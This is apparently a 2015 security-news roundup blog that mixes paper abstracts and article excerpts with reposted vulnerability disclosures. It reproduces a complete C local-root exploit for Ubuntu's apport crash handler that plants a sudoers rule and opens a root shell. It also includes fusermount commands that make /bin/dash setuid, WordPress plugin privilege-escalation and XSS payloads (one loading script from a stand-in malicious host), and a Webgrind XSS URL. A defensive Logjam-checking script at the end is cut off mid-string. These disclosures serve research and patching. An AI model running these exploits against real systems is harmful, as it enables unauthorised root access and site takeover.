Friday, May 22, 2015

Paper: Security Analysis of Consumer-Grade Anti-Theft Solutions Provided by Android Mobile Anti-Virus Apps

Abstract
We study the “anti-theft” mechanisms available to consumers to thwart unauthorised access to personal data on stolen Android smartphones. With millions of devices stolen in the USA in 2013 alone, such attacks are a serious and growing problem. The main mitigation against unauthorised data access on stolen devices is provided by “anti-theft” apps; that is, with “remote wipe” and “remote lock” functions. We study the top 10 Mobile Anti-Virus (MAV) apps that implement these functions. They have been downloaded hundreds of millions of times.

We investigate the general security practices of MAVs, as well as the implementation of their “remote wipe” and “remote lock” functions. Our analysis uncovers flaws that undermine MAV security claims and highlight the fragility of third-party security apps. We find that MAV remote locks may be unreliable due to poor implementation practices, Android API limitations and vendor customisations. Mobile OS architectures leave third-party security apps little leeway to improve built-in Factory Resets, therefore MAV remote wipe functions are not an alternative to a flawed built-in Factory Reset. We conclude the only viable solutions are those driven by vendors themselves.

more here.........http://ieee-security.org/TC/SPW2015/MoST/papers/s3p3.pdf

Additional Article- Exploring CVE-2015-1701 — A Win32k Elevation of Privilege Vulnerability Used in Targeted Attacks

Our analysis of the win32k.sys vulnerability used in a recent targeted attack reveals that it opens up an easy way to bypass the sandbox, making it a bigger threat than originally thought.

As mentioned in Microsoft security bulletin MS15-051, CVE-2015-1701 is an elevation of privilege vulnerability that exists when the Win32k.sys kernel-mode driver improperly handles objects in memory. The vulnerability exists in Win32k.sys, which is a weak security point in Windows.

Elevation of privilege vulnerabilities are technically less dangerous since they can’t be exploited remotely, but since this vulnerability can be used to bypass the sandbox — a security feature designed to keep attackers from being able to execute malicious files in users’ environment — this becomes a viable tool for attackers.

more here.......http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-cve-2015-1701-a-win32k-elevation-of-privilege-vulnerability-used-in-targeted-attacks/

WebSockets From Scratch

This guide is aimed at people who are new to WebSocket, or just wish to know more about what’s under the hood. What I’ll cover, in around 100 lines of Ruby, is:

The HTTP handshake that initiates a WebSocket connection.
Listening to messages on the server.
Sending messages from the server.

more here........https://blog.pusher.com/websockets-from-scratch/

Malware attack on both Windows and Android

On the 7th of May, 2015 we observed a new malicious e-mail campaign, which used the logo and the name of the Polish Post Office (”Poczta Polska”). The e-mails supposedly informed the recipient about an undelivered package; however, they also included a link which, after several redirects, led to the download of a malicious file. This file was either a Windows executable or an Android APK file (depending on the presented User-Agent string).

The e-mails were similar to the one presented below here.........http://www.cert.pl/news/10180/langswitch_lang/en

Exploring a Hacker Marketplace

In the sharing economy, you can hire a one-off driver (Uber), courier (Postmates), grocery shopper (Instacart), housekeeper (Homejoy), or just about any other variety of henchman (TaskRabbit). So, what about hiring a hacker?

That’s the premise of Hacker’s List, a website launched in November. Anyone can post or bid on a hacking project. Hacker’s List arranges secure communication and payment escrow.

more here........http://webpolicy.org/2015/05/21/exploring-a-hacker-marketplace/

Improved PDF analysis and Windows 10 Preview

Today we made another 'technological leap' with VxStream Sandbox related to PDF analysis. As most of you surely know, PDF phishing campaigns are a very popular attack vector (invoice/mail tracking PDF with a link to the malicious file). The new version of VxStream is capable of parsing PDF file structure and pulls out URLs it finds. Not only that, but it will also download files at the URLs and execute them if they are supported by the environment. If the downloaded file is a zip archive, it will even unpack it before analysis. Sounds good? :) It is!

more here..........http://payload-security.blogspot.de/2015/05/greatly-improved-pdf-analysis-and.html

A Faster Way to Identify High Risk Windows Assets

Scanning is a pretty common first step when trying to identify Windows systems that are missing critical patches.  However, there is a faster way to start the process.  Active Directory stores the operating system version and service pack level for every Windows system associated with the domain.  Historically that information has been used during penetration tests to target systems missing patches like MS08-067, but it can also be used by blue teams to help streamline identification of high risk assets as part of their standard vulnerability management approach.  In this blog I’ll cover a high level overview of how it can be done and point to a few scripts that can be used to help automate the process.

read more here..........https://blog.netspi.com/a-faster-way-to-identify-high-risk-windows-assets/

Paper: Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android Applications

Abstract Android’s Inter-Component Communication (ICC) mechanism strongly relies on Intent messages. Unfortunately, due to the lack of message origin verification in Intents, implementing security policies based on message sources is hard in practice, and completely relies on the programmer’s skill and attention. In this paper, we present a framework for automatically detecting Intent input validation vulnerabilities. We are thus able to highlight component fragments that expose vulnerable resources to possible malicious message senders. Most importantly, we advance the state of the art by developing a method to automatically demonstrate whether the identified vulnerabilities can be exploited or not, adopting a formal approach to automatically produce malicious payloads that can trigger dangerous behavior in vulnerable applications. We therefore eliminate the high rate of false positives common in previously applied methods. We test our methods on a representative sample of applications, and we find that 29 out of 64 tested applications are detected as potentially vulnerable, while 26 out of 29 can be automatically proven to be exploitable. Our experiments demonstrate the lack of exhaustive sanity checks when receiving messages from unknown sources, and stress the underestimation of this problem in real world application development.

CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]

# Exploit Title: WordPress WP Membership plugin [Privilege escalation]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4038

1 Description
  
Any registered user can perform a privilege escalation through the `iv_membership_update_user_settings` AJAX action. 
Although this exploit can also be used to modify other plugin-related data (e.g. payment status and expiry date), privilege 
escalation can lead to a serious incident because the malicious user can take an administrative role on the affected 
website.
  
2 Proof of Concept

* Login as a regular user
* Send a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: 
`action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`

3 Actions taken after discovery

Vendor was informed on 2015/05/19.
  
4 Solution
  
No official solution yet exists.

CVE-2015-4039 - WordPress WP Membership plugin [Stored XSS]

# Exploit Title: WordPress WP Membership plugin [Stored XSS]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4039

=============================================
* 1. Stored XSS
=============================================

1.1 Description
  
All input fields from registered users aren't properly escaped. This could lead to an XSS attack that could possibly 
affect all visitors of the website, including administrators.
  
1.2 Proof of Concept

* Login as a regular user
* Update any field of your profile, appending at the end
        `<script>alert('XSS');</script>` 
        or 
        `<script src="http://malicious .server/my_malicious_script.js"/>`
  
1.3 Actions taken after discovery

Vendor was informed on 2015/05/19.
  
1.4 Solution
  
No official solution yet exists.

=============================================
* 2. Unauthorized post publish and stored XSS
=============================================

2.1 Description
  
Registered users can publish a post without administrator confirmation. Normally all posts submitted by users 
registered with the WP Membership plugin are stored with the status `pending`. A malicious user, though, can publish his post 
by modifying the form that is used for submission.
  
2.2 Proof of Concept

* Login as a regular user who belongs to a group that can submit new posts
* Visit the `New Post` section at your profile
* Change field `post_status`:
        <select id="post_status" class="form-control" name="post_status">
                <option value="publish" selected="selected">Pending Review</option>
                <option value="draft">Draft</option>
        </select>

The post gets immediately published after you submit the form and is visible to all visitors of the website.

In addition a stored XSS attack can be performed due to insufficient escaping of the post content input.
  
2.3 Actions taken after discovery

Vendor was informed on 2015/05/19.
  
2.4 Solution
  
No official solution yet exists.

2.5 Workaround

Prevent users from submitting new posts through the corresponding option in the plugin's settings.

Paper: Measuring and mitigating AS-level adversaries against Tor

Abstract The popularity of Tor as an anonymity system has made it a popular target for a variety of attacks including blocking, denial of service, and timing attacks. In this paper, we focus on timing attacks which are no longer solely in the realm of academic research with recent revelations about the NSA and GCHQ actively working to implement them in practice. We specifically focus on recently exposed timing attacks that leverage asymmetric routing and information gained on reverse network paths (e.g., via TCP ACK numbers) to deanonymize Tor users. First, we present an empirical study which leverages scalable algorithmic simulations of routing policies on an up-to-date map of the Internet’s topology, including complex AS relationships and sibling ASes. Our approach allows us to gain a high fidelity snapshot of the threat of timing correlation attacks in the wild. In our experiments we find that 58% of all circuits created by Tor are vulnerable to attacks by timing correlation and colluding sibling ASes. In addition, we find that in some regions (notably, China) there exist a number of cases where it is not possible for Tor to construct a circuit that is safe from these correlation attacks. To mitigate the threat of such attacks, we build Astoria, an AS-aware Tor client. Astoria leverages recent developments in network measurement to perform path prediction and intelligent relay selection. Astoria not only reduces the number of vulnerable circuits to 5.8%, but also considers how circuits should be created when there are no safe possibilities. Astoria also performs load balancing across the Tor network, so as to not overload low capacity relays. In addition, Astoria provides reasonable performance even in its most secure configuration.

more here.........http://arxiv.org/pdf/1505.05173.pdf

qboot

Minimal x86 firmware for booting Linux kernels here........https://github.com/bonzini/qboot

Paper: Indirect File Leaks in Mobile Applications

Abstract Today, much of our sensitive information is stored inside mobile applications (apps), such as the browsing histories and chatting logs. To safeguard these privacy files, modern mobile systems, notably Android and iOS, use sandboxes to isolate apps’ file zones from one another. However, we show in this paper that these private files can still be leaked by indirectly exploiting components that are trusted by the victim apps. In particular, we devise new indirect file leak (IFL) attacks that exploit browser interfaces, command interpreters, and embedded app servers to leak data from very popular apps, such as Evernote and QQ. Unlike the previous attacks, we demonstrate that these IFLs can affect both Android and iOS. Moreover, our IFL methods allow an adversary to launch the attacks remotely, without implanting malicious apps in victim’s smartphones. We finally compare the impacts of four different types of IFL attacks on Android and iOS, and propose several mitigation methods.

more here.....http://ieee-security.org/TC/SPW2015/MoST/papers/s2p2.pdf

Linking Attackers and Tools pt. 2

The Problem

In my last post I discussed using Splunk and the custom_vizs app to create links between attackers using common infrastructure. At the end I discussed some of the problems with this implementation so I decided to solve some of those problems. The major problem is that the graph doesn't really give much information just at a glance. So this is the one I set out to solve and I came up with two different solutions.

Splunk

I love Splunk. I used to use what is now known as the ELK stack but after I discovered the true power of Splunk it is a very worthy investment. Since this problem started in Splunk it is only fitting that I also solve it with Splunk and I solved it with the join command.

A new Metasploit module for SOHO devices

This module exploits an authentication bypass vulnerability in different Netgear devices.
+        It allows to extract the password for the remote management interface. This module has been
+        tested on a Netgear WNDR3700v4 - V1.0.1.42, but others devices are reported as vulnerable:
+        NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,
+        NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),
+        NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),
+        NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),
+        NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),
+        NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),
+        NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),
+        NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),
+        NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),
+        NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton)

Access here...........https://github.com/rapid7/metasploit-framework/commit/305da464918d35bfca3e13acaa5a2afcbab91052

Joke or Blunder: Carbanak C&C Leads to Russia Federal Security Service

In an interesting turn of events, a C&C used in the Carbanak targeted attack campaign now resolves to an IP linked to the Russian Federal Security Service (FSB).
Yesterday, while checking the indicator of compromise (IOC) data from the Carbanak report, I noticed that the domain name systemsvc.net (which was identified as a C&C server in the report) now resolves to the IP address 213.24.76.23. When I checked for related information, I found that the said IP is under ASN AS8342 RTCOMM-AS OJSC RTComm.RU and its identified location is Moscow City – Moscow – Federal Security Service Of Russian Federation.

Thursday, May 21, 2015

CVE-2015-1325 apport race conditions / ubuntu local root exploit

Hello, this is CVE-2015-1325 which was reported to the Ubuntu Security Team
on 2015-05-11. 

There are several race conditions in the apport crash reporter, leading to a
reliable local root privilege escalation that affects all current LTS versions
of Ubuntu Server/Desktop (default install).

Apport is also available on other distributions but as far as I know it is
only in use by default on Ubuntu.

--- DETAILS

Apport is specified as the coredump handler (/proc/sys/kernel/core_pattern)
since at least Ubuntu 12.04.

When a process receives a signal that should generate a coredump,
/usr/share/apport/apport will be invoked by the kernel as root.

On line 284, apport "partially drops privileges":
        drop_privileges(pid, True)

However, this has no real security benefit since the euid of the process will
still be root. In fact, this will make the second part of the attached exploit
more reliable because it allows us to send the privileged apport process
SIGSTOP/SIGCONT and hit the last race easily.

On line 394 apport opens a file in /var/crash:
        with open(report, 'rb') as f:

report is the filename, which can be easily predicted. If a user with uid 1000
makes /bin/sleep crash, the filename will be: /var/crash/_bin_sleep.1000.crash

The directory /var/crash is world writable, so we can create a FIFO in this
directory before making our program crash. Apport will then try to read our
file and hang on line 394 until a report is written to the FIFO by us.

When apport is in this paused state, we can kill our original process and keep
forking until we get the same pid again. We then make this process execute
/bin/su which makes our original pid belong to a root process.

The drop_privileges() function on line 49 incorrectly uses the pid as the
indicator as to which uid we should drop privileges to:

def drop_privileges(pid, partial=False):
[...]
        stat = os.stat('/proc/%s/stat' % pid)
[...]
        effective_uid = stat.st_uid
[...]
        os.setreuid(stat.st_uid, effective_uid)

We can therefore make apport "drop" privileges to uid 0 and write a corefile
anywhere on the system.

This can be used to write a corefile with crafted contents in a suitable
location to gain root privileges.

On versions since at least Ubuntu 14.04 it is possible to completely control
the contents of the written corefile. This allows easy and reliable
exploitation by leveraging /etc/sudoers.d.

--- EXPLOIT FLOW

1. Create a FIFO in /var/crash/_bin_sleep.$uid.crash.
2. fork(), chdir("/etc/sudoers.d"), execute /bin/sleep and send SIGSEGV
3. Send SIGKILL to the process in (2), fork() until we get the same pid
   as the process we killed.
4. In our new process with the original pid, execute /bin/su.
5. Send valid report data to /var/crash/_bin_sleep.$uid.crash.
6. Core file is written to /etc/sudoers.d/core as root with mode 0600.

We could put this corefile in /etc/cron.hourly, /etc/logrotate.d and so on.

Additionally, on 14.04+ we can do this:

The partial privilege drop on line 284 allows us to send SIGSTOP to apport,
which gives us great control over the execution flow. On line 460 apport will
ultimately write the corefile contents by reading from the report file it just
created in /var/crash.

7. Keep sending SIGSTOP/SIGCONT until these lines have been executed:
   404: os.unlink(report)
   410: reportfile = os.fdopen(os.open(report, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0), 'wb')
8. Unlink /var/crash/_bin_sleep.$uid.crash
9. Create FIFO in /var/crash/_bin_sleep.$uid.crash
10. Write crafted contents to /var/crash/_bin_sleep.$uid.crash
11. Apport will read our FIFO at line 155 and create a corefile with our
    crafted contents.

--- CREDIT

Philip Pettersson, Samsung SDS Security Center

--- EXPLOIT

/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1325 / apport-pid-race.c
apport race conditions

ubuntu local root
tested on ubuntu server 14.04, 14.10, 15.04

core dropping bug also works on older versions, but you can't
write arbitrary contents. on 12.04 /etc/logrotate.d might work,
didn't check. sudo and cron will complain if you drop a real ELF
core file in sudoers.d/cron.d

unpriv () ubuntu-1504:~$ gcc apport-race.c -o apport-race && ./apport-race
created /var/crash/_bin_sleep.1002.crash
crasher: my pid is 1308
apport stopped, pid = 1309
getting pid 1308
current pid = 1307..2500..5000..7500..10000........
** child: current pid = 1308
** child: executing /bin/su
Password: sleeping 2s..

checker: mode 4532
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..

checker: new mode 32768 .. done
checker: SIGCONT
checker: writing core
checker: done
success
# id
uid=0(root) gid=0(root) groups=0(root)

85ad63cf7248d7da46e55fa1b1c6fe01dea43749
2015-05-10
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <unistd.h>
#include <string.h>
#include <sys/wait.h>


/* one C string; it was wrapped across several lines in the mailing-list copy */
char *crash_report =
    "ProblemType: Crash\nArchitecture: amd64\nCrashCounter: 0\n"
    "Date: Sat May  9 18:18:33 2015\nDistroRelease: Ubuntu 15.04\n"
    "ExecutablePath: /bin/sleep\nExecutableTimestamp: 1415000653\n"
    "ProcCmdline: sleep 1337\nProcCwd: /home/rebel\n"
    "ProcEnviron:\n XDG_RUNTIME_DIR=<set>\n"
    "ProcMaps:\n 00400000-00407000 r-xp 00000000 08:01 393307                             /bin/sleep\n"
    "ProcStatus:\n Name:  sleep\nSignal: 11\n"
    "Uname: Linux 3.19.0-15-generic x86_64\n"
    "UserGroups:\n_LogindSession: 23\n"
    "CoreDump: base64\n"
    " H4sICAAAAAAC/0NvcmVEdW1wAA==\n"
    " U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA==\n";
/*
last line is the stuff we write to the corefile

c = zlib.compressobj(9,zlib.DEFLATED,-zlib.MAX_WBITS)
t = '# \x01\x02\x03\x04\n\n\nALL ALL=(ALL) NOPASSWD: ALL\n'
# need some non-ASCII bytes so it doesn't turn into a str()
# which makes apport fail with the following error:
#    os.write(core_file, r['CoreDump'])
# TypeError: 'str' does not support the buffer interface
t = bytes(t,'latin1')
c.compress(t)
a = c.flush()
import base64
base64.b64encode(a)

# b'U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA=='
*/

int apport_pid;
char report[128];

void steal_pid(int wanted_pid)
{
    int x, pid;

    pid = getpid();

    fprintf(stderr,"getting pid %d\n", wanted_pid);
    fprintf(stderr,"current pid = %d..", pid);

    for(x = 0; x < 500000; x++) {
        pid = fork();
        if(pid == 0) {
            pid = getpid();
            if(pid % 2500 == 0)
                fprintf(stderr,"%d..", pid);

            if(pid == wanted_pid) {
                fprintf(stderr,"\n** child: current pid = %d\n", pid);
                fprintf(stderr,"** child: executing /bin/su\n");

                execl("/bin/su", "su", NULL);
            }
            exit(0);
            return;
        }
        if(pid == wanted_pid)
            return;

        wait(NULL);
    }

}



void checker(void)
{
    struct stat s;
    int fd, mode, x;

    stat(report, &s);

    fprintf(stderr,"\nchecker: mode %d\nwaiting for file to be unlinked..", s.st_mode);

    mode = s.st_mode;

    while(1) {
// poor man's pseudo-singlestepping
        kill(apport_pid, SIGCONT);
        kill(apport_pid, SIGSTOP);

// need to wait a bit for the signals to be handled,
// otherwise we'll miss when the new report file is created
        for(x = 0; x < 100000; x++);

        stat(report, &s);

        if(s.st_mode != mode)
            break;
    }

    fprintf(stderr,"\nchecker: new mode %d .. done\n", s.st_mode);

    unlink(report);
    mknod(report, S_IFIFO | 0666, 0);

    fprintf(stderr,"checker: SIGCONT\n");
    kill(apport_pid, SIGCONT);

    fprintf(stderr,"checker: writing core\n");

    fd = open(report, O_WRONLY);
    write(fd, crash_report, strlen(crash_report));
    close(fd);
    fprintf(stderr,"checker: done\n");

    while(1)
        sleep(1);
}



void crasher()
{
    chdir("/etc/sudoers.d");

    fprintf(stderr,"crasher: my pid is %d\n", getpid());

    execl("/bin/sleep", "sleep", "1337", NULL);

    exit(0);
}


int main(void)
{
    int pid, checker_pid, fd;
    struct rlimit limits;
    struct stat s;

    limits.rlim_cur = RLIM_INFINITY;
    limits.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &limits);

    pid = fork();

    if(pid == 0)
        crasher();

    sprintf(report, "/var/crash/_bin_sleep.%d.crash", getuid());

    unlink(report);
    mknod(report, S_IFIFO | 0666, 0);

    fprintf(stderr,"created %s\n", report);

    usleep(300000);
    kill(pid, 11);
    apport_pid = pid + 1;
// could check that pid+1 is actually apport here but it's
// kind of likely
    fprintf(stderr,"apport stopped, pid = %d\n", apport_pid);

    usleep(300000);

    kill(pid, 9);
    steal_pid(pid);
    sleep(1);

    kill(apport_pid, SIGSTOP);

    checker_pid = fork();

    if(checker_pid == 0) {
        checker();
        exit(0);
    }

    fprintf(stderr,"sleeping 2s..\n");
    sleep(2);

    fprintf(stderr,"writing to fifo\n");

    fd = open(report, O_WRONLY);
    write(fd, crash_report, strlen(crash_report));
    close(fd);

    fprintf(stderr,"fifo written.. wait...\n");
    fprintf(stderr,"waiting for /etc/sudoers.d/core to appear..\n");

    while(1) {
        stat("/etc/sudoers.d/core", &s);
        if(s.st_size == 37)
            break;
        usleep(100000);
    }

    fprintf(stderr,"success\n");
    kill(pid, 9);
    kill(checker_pid, 9);
    return system("sudo -- sh -c 'stty echo;sh -i'");
}


Forensic Browser - quick start

In this article I want to cover a few of the areas where the Forensic Browser for SQLite provides features that are missing in other browsers or where it complements other more generic forensic software by providing features that are specific to general databases rather than specific ones. The Browser does this by providing a Visual Query Building environment (drag and drop SQL query generation) allowing the creation of very powerful and customised reports often without typing a single character.

more here........http://sandersonforensics.com/forum/content.php?232-Forensic-Browser-quick-start

Mumblehard Malware

In this article, we will learn about a malware family known as Mumblehard, which targets Linux and BSD systems. This malware opens a backdoor that gives cybercriminals full control of the infected machine.

more here........http://resources.infosecinstitute.com/mumblehard-malware/

Fake jQuery Scripts in Nulled WordPress Plugins

We recently investigated some random redirects on a WordPress website that would only happen to certain visitors. Traffic analysis showed us that it was not a server-side redirect, rather it happened due to some script loaded by the web pages.
A quick look through the HTML code revealed this script:
Fake jQuery script injection
It was very suspicious for a few reasons

Hacking Starbucks for unlimited coffee

This is a story about how I found a way to generate an unlimited amount of money on Starbucks gift cards to get a life-time supply of coffee or steal a couple of million dollars.

So I got an idea to buy 3 Starbucks cards $5 each

starbucks.com has personal accounts where you can add gift cards, check balances and even transfer money between your gift cards.

There’s an interesting class of vulnerabilities called “race condition”. It’s a very common bug for websites with balances, vouchers or other limited resources (mostly money).

more here..........http://sakurity.com/blog/2015/05/21/starbucks.html

CVE-2015-3202 fuse privilege escalation

Hello, this was discussed on the distros list last week.

The fusermount binary calls setuid(geteuid()) to reset the ruid when
it invokes /bin/mount so that it can use privileged mount options that
are normally restricted if ruid != euid. That's acceptable (but scary)
in theory, because fusermount can sanitize the call to make sure it's
safe.

http://sources.debian.net/src/fuse/2.9.3-15/util/mount_util.c/?hl=99#L99

However, because mount thinks it's being invoked by root, it allows
access to debugging features via the environment that would not
normally be safe for unprivileged users and fusermount doesn't
sanitize them.

Therefore, the bug is that the environment is not cleared when calling
mount with ruid=0. One debugging feature available is changing the
location of /etc/mtab by setting LIBMOUNT_MTAB, which can be abused to
overwrite arbitrary files.

This can be exploited like so.

$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 755 /tmp/exploit
$ mkdir -p '/tmp/exploit||/tmp/exploit'
$ LIBMOUNT_MTAB=/etc/bash.bashrc  _FUSE_COMMFD=0 fusermount
'/tmp/exploit||/tmp/exploit'
fusermount: failed to open /etc/fuse.conf: Permission denied
sending file descriptor: Socket operation on non-socket
$ cat /etc/bash.bashrc
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=taviso 0 0

Then simply wait for root to login, or alternatively overwrite
/etc/default/locale and wait for cron to run a script that sources it.
That means root wouldn't have to log in, but you would have to wait
around until midnight to check if it worked.

Tavis Ormandy


Webgrind XSS vulnerability

Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt

Vendor:
https://github.com/jokkedk/webgrind

Product:
Webgrind is a Xdebug Profiling Web Frontend in PHP.

Advisory Information:
=====================================================
Webgrind is vulnerable to cross site scripting attacks.

Exploit code:
==============
http://localhost/webgrind/index.php?op=fileviewer&file=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E

Disclosure Timeline:
==================================

Vendor Notification  May 19, 2015
May 20, 2015: Public Disclosure


Severity Level:
===============
Med

Description:
============

Request Method(s):
                                [+] GET

Vulnerable Product:
                                [+] Webgrind 

Vulnerable Parameter(s):
                                [+] file=[XSS]

Affected Area(s):
                                [+] Current user.

==============================

(hyp3rlinx)

Efficient, Offline Access for Neustar IP Intelligence Data

IP intelligence is useful for applications such as localization and enforcing security policy. Duo uses such information to power parts of our recently released Platform Edition. Two popular vendors in this space are Neustar and MaxMind. MaxMind’s GeoIP services tend to cost less or are entirely free, both of which have contributed to greater availability of open-source tools. Neustar’s GeoPoint service provides additional and different data; however, it isn’t as widely used, and, as such, there isn’t as strong of an open-source community. Additionally, GeoPoint is delivered in CSV format, which is computationally expensive to query in real time.

We have developed and released a solution to solve these two problems (lack of community-maintained tools and computational query cost) by converting Neustar GeoPoint data into the database format used by MaxMind GeoIP. This allows Neustar customers to take advantage of the speed of MaxMind’s offline database format and the collection of community-supported tools for MaxMind databases.

more here........https://www.duosecurity.com/blog/efficient-offline-access-neustar-ip-intelligence

How to Pass-the-Hash with Mimikatz

I’m spending a lot of time with mimikatz lately. I’m fascinated by how much capability it has and I’m constantly asking myself, what’s the best way to use this during a red team engagement?

A hidden gem in mimikatz is its ability to create a trust relationship from a username and password hash. Here’s the mimikatz command to do this http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/

Paper: Security Analysis of Android Factory Resets

Abstract With hundreds of millions of devices expected to be traded by 2018, flaws in smartphone sanitisation functions could be a serious problem. Trade press reports have already raised doubts about the effectiveness of Android “Factory Reset”, but this paper presents the first comprehensive study of the issue. We study the implementation of Factory Reset on 21 Android smartphones from 5 vendors running Android versions v2.3.x to v4.3. We estimate that up to 500 million devices may not properly sanitise their data partition where credentials and other sensitive data are stored, and up to 630 million may not properly sanitise the internal SD card where multimedia files are generally saved. We found we could recover Google credentials on all devices presenting a flawed Factory Reset. Full-disk encryption has the potential to mitigate the problem, but we found that a flawed Factory Reset leaves behind enough data for the encryption key to be recovered. We discuss practical improvements for Google and vendors to mitigate these risks in the future.

more here........http://www.cl.cam.ac.uk/~rja14/Papers/fr_most15.pdf

sandbox_toolkit

Various tools to deal with OS X and iOS sandbox profiles here......https://github.com/sektioneins/sandbox_toolkit

Attack Gains Foothold Against East Asian Government Through “Auto Start”

East Asian government agencies came under siege when attackers targeted several servers within their networks. The attackers, who showed familiarity and in-depth knowledge of the agencies’ network topology, tools and software, were able to gain access to the targeted servers and install malware. They then used the compromised servers not only as gateways to the rest of the network but also as C&C servers. This particular attack has been active since 2014.

The attackers tried to maintain their presence in the network by modifying applications installed on the servers. Certain files in those applications (mostly productivity, security and system utility apps) were tampered with to load malicious DLL files. The common denominator among the tampered apps is that they were all set to run at system startup, which suggests the applications were modified to ensure that the installed malware runs every time the server boots.

more here.......http://blog.trendmicro.com/trendlabs-security-intelligence/attack-gains-foothold-against-east-asian-government-through-auto-start/

Test if your server is affected by the Logjam attack using openssl(1) 1.0

The Logjam attack exploits a weakness affecting all versions of the TLS protocol that allows a man-in-the-middle to downgrade the key exchange to 512-bit export-grade Diffie-Hellman.

Our recommendation has always been to use Diffie-Hellman parameters longer than 1024 bits. The general recommendation is 4096 bits wherever possible, and at least the same length as your RSA key: that means at least 2048-bit DH parameters when using 2048-bit RSA keys.

more here........https://bettercrypto.org/blog/2015/05/20/tls-logjam/
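The check described above, as an added example that is not code from the bettercrypto.org post: run `openssl s_client` against the server restricted to ephemeral DH suites (or to export suites only), then classify the negotiated cipher and the printed DH group size. It assumes OpenSSL 1.0.2 or later, which prints a `Server Temp Key: DH, <n> bits` line; the transcripts embedded below are constructed, not captured from real hosts, so the parser can be exercised offline.

```python
"""Classify a server's Diffie-Hellman key exchange from `openssl s_client` output.

Added example, not code from the bettercrypto.org post. Assumes OpenSSL 1.0.2+
(prints "Server Temp Key: DH, <n> bits"). Transcripts below are constructed.
"""
import re
import subprocess
from typing import List

MIN_DH_BITS = 2048   # the post's floor: at least your RSA key size, 4096 where possible

_TEMP_KEY = re.compile(r"Server Temp Key:\s*(?P<kind>DH|ECDH|X25519)\b[,\s]*(?P<detail>[^\n]*)")
_CIPHER = re.compile(r"^\s*Cipher\s*:\s*(?P<name>\S+)", re.MULTILINE)


def s_client_command(host: str, port: int = 443, ciphers: str = "EDH") -> List[str]:
    """argv for the probe. 'EDH' forces ephemeral DH so the group size is printed;
    pass 'EXP' to offer only export suites: then any completed handshake is a fail."""
    return ["openssl", "s_client", "-connect", f"{host}:{port}", "-cipher", ciphers]


def run_s_client(host: str, port: int = 443, ciphers: str = "EDH") -> str:
    """Run the probe (needs network access; not exercised offline)."""
    proc = subprocess.run(s_client_command(host, port, ciphers), input=b"",
                          capture_output=True, timeout=15)
    return proc.stdout.decode(errors="replace") + proc.stderr.decode(errors="replace")


def assess_dh(s_client_output: str) -> dict:
    """Return {'cipher', 'dh_bits', 'verdict'}; verdict is one of
    refused / vulnerable / weak / ok / unknown."""
    cipher_m = _CIPHER.search(s_client_output)
    cipher = cipher_m.group("name") if cipher_m else None
    result = {"cipher": cipher, "dh_bits": None, "verdict": None}
    if cipher is None or cipher == "0000":
        result["verdict"] = "refused"          # server accepted none of the offered suites
        return result
    if cipher.startswith("EXP"):
        result["verdict"] = "vulnerable"       # export-grade suite negotiated: Logjam target
    key_m = _TEMP_KEY.search(s_client_output)
    if key_m and key_m.group("kind") == "DH":
        bits_m = re.search(r"(\d+)\s*bits", key_m.group("detail"))
        if bits_m:
            bits = int(bits_m.group(1))
            result["dh_bits"] = bits
            if result["verdict"] is None:
                if bits < 1024:
                    result["verdict"] = "vulnerable"   # 512-bit group: logs in minutes
                elif bits < MIN_DH_BITS:
                    result["verdict"] = "weak"         # 1024-bit: within nation-state reach
                else:
                    result["verdict"] = "ok"
    elif key_m:
        result["verdict"] = result["verdict"] or "ok"  # ECDHE/X25519: no finite-field group
    if result["verdict"] is None:
        result["verdict"] = "unknown"          # no Temp Key line: openssl too old to tell
    return result


# Constructed transcripts, trimmed to the lines the parser uses.
SAMPLE_EXPORT = """\
New, TLSv1/SSLv3, Cipher is EXP-EDH-RSA-DES-CBC-SHA
Server public key is 2048 bit
Server Temp Key: DH, 512 bits
---
SSL-Session:
    Protocol  : TLSv1
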